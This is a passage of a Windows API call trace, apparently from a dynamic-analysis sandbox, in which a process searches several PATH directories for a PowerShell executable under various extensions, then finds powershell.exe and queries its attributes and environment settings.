	[0815.721] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c74d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0815.721] SetErrorMode (uMode=0x1) returned 0x1
	[0815.721] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JS", lpFindFileData=0x1c74d980 | out: lpFindFileData=0x1c74d980*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.721] SetErrorMode (uMode=0x1) returned 0x1
	[0815.721] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c74d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0815.722] SetErrorMode (uMode=0x1) returned 0x1
	[0815.722] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JSE", lpFindFileData=0x1c74d980 | out: lpFindFileData=0x1c74d980*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.722] SetErrorMode (uMode=0x1) returned 0x1
	[0815.722] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c74d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0815.723] SetErrorMode (uMode=0x1) returned 0x1
	[0815.723] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSF", lpFindFileData=0x1c74d980 | out: lpFindFileData=0x1c74d980*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.723] SetErrorMode (uMode=0x1) returned 0x1
	[0815.723] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c74d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0815.723] SetErrorMode (uMode=0x1) returned 0x1
	[0815.723] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSH", lpFindFileData=0x1c74d980 | out: lpFindFileData=0x1c74d980*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.724] SetErrorMode (uMode=0x1) returned 0x1
	[0815.724] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c74d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0815.724] SetErrorMode (uMode=0x1) returned 0x1
	[0815.724] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.MSC", lpFindFileData=0x1c74d980 | out: lpFindFileData=0x1c74d980*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.724] SetErrorMode (uMode=0x1) returned 0x1
	[0815.724] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c74d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0815.725] SetErrorMode (uMode=0x1) returned 0x1
	[0815.725] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell", lpFindFileData=0x1c74d980 | out: lpFindFileData=0x1c74d980*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.725] SetErrorMode (uMode=0x1) returned 0x1
	[0815.725] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c74d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0815.725] SetErrorMode (uMode=0x1) returned 0x1
	[0815.725] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.ps1", lpFindFileData=0x1c74d980 | out: lpFindFileData=0x1c74d980*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.726] SetErrorMode (uMode=0x1) returned 0x1
	[0815.726] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c74d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0815.726] SetErrorMode (uMode=0x1) returned 0x1
	[0815.726] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psm1", lpFindFileData=0x1c74d980 | out: lpFindFileData=0x1c74d980*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.726] SetErrorMode (uMode=0x1) returned 0x1
	[0815.727] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c74d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0815.809] SetErrorMode (uMode=0x1) returned 0x1
	[0815.809] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psd1", lpFindFileData=0x1c74d980 | out: lpFindFileData=0x1c74d980*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.810] SetErrorMode (uMode=0x1) returned 0x1
	[0815.810] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c74d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0815.810] SetErrorMode (uMode=0x1) returned 0x1
	[0815.810] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.COM", lpFindFileData=0x1c74d980 | out: lpFindFileData=0x1c74d980*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.810] SetErrorMode (uMode=0x1) returned 0x1
	[0815.810] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c74d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0815.811] SetErrorMode (uMode=0x1) returned 0x1
	[0815.811] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.EXE", lpFindFileData=0x1c74d980 | out: lpFindFileData=0x1c74d980*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.811] SetErrorMode (uMode=0x1) returned 0x1
	[0815.811] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c74d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0815.811] SetErrorMode (uMode=0x1) returned 0x1
	[0815.811] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.BAT", lpFindFileData=0x1c74d980 | out: lpFindFileData=0x1c74d980*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.812] SetErrorMode (uMode=0x1) returned 0x1
	[0815.812] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c74d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0815.812] SetErrorMode (uMode=0x1) returned 0x1
	[0815.812] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.CMD", lpFindFileData=0x1c74d980 | out: lpFindFileData=0x1c74d980*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.812] SetErrorMode (uMode=0x1) returned 0x1
	[0815.813] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c74d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0815.813] SetErrorMode (uMode=0x1) returned 0x1
	[0815.813] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBS", lpFindFileData=0x1c74d980 | out: lpFindFileData=0x1c74d980*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.813] SetErrorMode (uMode=0x1) returned 0x1
	[0815.813] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c74d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0815.813] SetErrorMode (uMode=0x1) returned 0x1
	[0815.814] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBE", lpFindFileData=0x1c74d980 | out: lpFindFileData=0x1c74d980*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.814] SetErrorMode (uMode=0x1) returned 0x1
	[0815.814] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c74d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0815.814] SetErrorMode (uMode=0x1) returned 0x1
	[0815.814] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JS", lpFindFileData=0x1c74d980 | out: lpFindFileData=0x1c74d980*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.815] SetErrorMode (uMode=0x1) returned 0x1
	[0815.815] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c74d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0815.815] SetErrorMode (uMode=0x1) returned 0x1
	[0815.815] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JSE", lpFindFileData=0x1c74d980 | out: lpFindFileData=0x1c74d980*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.815] SetErrorMode (uMode=0x1) returned 0x1
	[0815.815] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c74d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0815.816] SetErrorMode (uMode=0x1) returned 0x1
	[0815.816] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSF", lpFindFileData=0x1c74d980 | out: lpFindFileData=0x1c74d980*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.816] SetErrorMode (uMode=0x1) returned 0x1
	[0815.816] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c74d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0815.816] SetErrorMode (uMode=0x1) returned 0x1
	[0815.816] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSH", lpFindFileData=0x1c74d980 | out: lpFindFileData=0x1c74d980*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.817] SetErrorMode (uMode=0x1) returned 0x1
	[0815.817] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c74d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0815.817] SetErrorMode (uMode=0x1) returned 0x1
	[0815.817] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.MSC", lpFindFileData=0x1c74d980 | out: lpFindFileData=0x1c74d980*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.817] SetErrorMode (uMode=0x1) returned 0x1
	[0815.818] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c74d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0815.818] SetErrorMode (uMode=0x1) returned 0x1
	[0815.818] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell", lpFindFileData=0x1c74d980 | out: lpFindFileData=0x1c74d980*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.818] SetErrorMode (uMode=0x1) returned 0x1
	[0815.821] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c74d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0815.821] SetErrorMode (uMode=0x1) returned 0x1
	[0815.821] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c74d980 | out: lpFindFileData=0x1c74d980*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.822] SetErrorMode (uMode=0x1) returned 0x1
	[0815.822] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c74d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0815.822] SetErrorMode (uMode=0x1) returned 0x1
	[0815.822] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c74d980 | out: lpFindFileData=0x1c74d980*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.822] SetErrorMode (uMode=0x1) returned 0x1
	[0815.823] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c74d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0815.823] SetErrorMode (uMode=0x1) returned 0x1
	[0815.823] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c74d980 | out: lpFindFileData=0x1c74d980*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.823] SetErrorMode (uMode=0x1) returned 0x1
	[0815.823] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c74d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0815.823] SetErrorMode (uMode=0x1) returned 0x1
	[0815.823] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c74d980 | out: lpFindFileData=0x1c74d980*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.824] SetErrorMode (uMode=0x1) returned 0x1
	[0815.824] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c74d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0815.824] SetErrorMode (uMode=0x1) returned 0x1
	[0815.824] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c74d980 | out: lpFindFileData=0x1c74d980*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0x2d9840
	[0815.825] FindNextFileW (in: hFindFile=0x2d9840, lpFindFileData=0x1c74d990 | out: lpFindFileData=0x1c74d990*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0
	[0815.826] FindClose (in: hFindFile=0x2d9840 | out: hFindFile=0x2d9840) returned 1
	[0815.826] SetErrorMode (uMode=0x1) returned 0x1
	[0815.827] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c74daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0815.827] SetErrorMode (uMode=0x1) returned 0x1
	[0815.827] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c74dcb0 | out: lpFileInformation=0x1c74dcb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00)) returned 1
	[0815.827] SetErrorMode (uMode=0x1) returned 0x1
	[0815.828] CoTaskMemAlloc (cb=0x104) returned 0x2b2450
	[0815.828] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b2450, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0815.828] CoTaskMemFree (pv=0x2b2450) 
	[0815.830] CoTaskMemAlloc (cb=0x104) returned 0x2b2450
	[0815.830] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b2450, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0815.830] CoTaskMemFree (pv=0x2b2450) 
	[0815.833] CoTaskMemAlloc (cb=0x104) returned 0x2b2450
	[0815.833] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b2450, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0815.833] CoTaskMemFree (pv=0x2b2450) 
	[0817.331] CoTaskMemAlloc (cb=0x104) returned 0x2b2450
	[0817.331] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b2450, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0817.332] CoTaskMemFree (pv=0x2b2450) 
	[0817.345] CoTaskMemAlloc (cb=0x3b) returned 0x2c9860
	[0817.345] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c74de98, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c74de98) returned 0x4550
	[0817.346] CoTaskMemFree (pv=0x2c9860) 
	[0817.349] GetConsoleWindow () returned 0x10410
	[0817.356] CoTaskMemAlloc (cb=0x104) returned 0x2b2450
	[0817.356] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b2450, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0817.356] CoTaskMemFree (pv=0x2b2450) 
